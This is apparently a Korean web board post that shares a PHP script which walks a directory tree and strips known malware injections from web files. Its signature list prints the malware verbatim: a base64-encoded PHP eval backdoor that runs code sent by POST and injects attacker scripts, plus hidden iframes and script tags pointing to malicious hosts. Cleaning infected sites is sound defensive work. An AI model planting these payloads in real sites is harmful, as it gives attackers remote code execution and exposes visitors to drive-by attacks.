본문
실행한 디렉토리부터 하위단에 있는 모든 파일을 다 뒤져서 감염된 파일을
수정하는 방식으로 되어 있다.
<?php
//usage : php -f kickHack.php @infected directory root
$hackArr = array(
'<?php eval(base64_decode(\'aWYoIWZ1bmN0aW9uX2V4aXN0cygndnIxJykpe2Z1bmN0aW9uIHZyMSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzcGhhVzU1Y205NExtTnZiUzlmY0hKcGRtRjBaUzlvWldGa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdnIxMigkYSwkYiwkYywkZCl7Z2xvYmFsJHZyMTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHZyMTEpKWNhbGxfdXNlcl9mdW5jKCR2cjExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2cjEnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd2cjEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdnIxbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndnIxMicpKSE9J3ZyMTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==\')); ?>',
'document.write(\'<script src=http://zainyrox.com/_private/header.php ><\/script>\');',
'<script src=http://zainyrox.com/_private/header.php ></script>',
'<iframe frameborder="0" onload="if (!this.src){ this.src=\'http://superkahn.ru:8080/index.php\'; this.height=\'0\'; this.width=\'0\';}" >fspcmsjgtslisadhstuqkmwehtuenjt</iframe>',
'<div style="display:none">kagigwwmmrjjjyrfqapcnzywvzeuijp<iframe width=127 height=336 src="http://icq-tel.ru:8080/index.php" ></iframe></div>'
);
$startDIR = $_SERVER['PWD'];
$self = $startDIR.'/'.$_SERVER['PHP_SELF'];
function healFile($dir){
global $hackArr,$self;
$matchcnt = 0;
$files = scandir($dir);
while ( $files ) {
$popname = array_pop($files);
$theFile = $dir.'/'.$popname;
if ( is_dir($theFile) && !in_array($popname,array('.','..')) ){
healFile($theFile);
} else if ( $self == $theFile ){
} else if( in_array(substr($popname,-4),array('.htm','.php','.inc')) || substr($popname,-5) == '.html' || substr($popname,-3) == '.js' ){
$cont = file_get_contents($theFile);
$res = str_replace($hackArr,'',$cont,$cnt);
if ( $cnt > 0 ){
$matchcnt++;
file_put_contents($theFile,$res);
}
}
}
if ( $matchcnt > 0 ){
echo $dir.' '.$matchcnt." found\n";
}
}
healFile($startDIR);
?>
관련링크
댓글목록
등록된 댓글이 없습니다.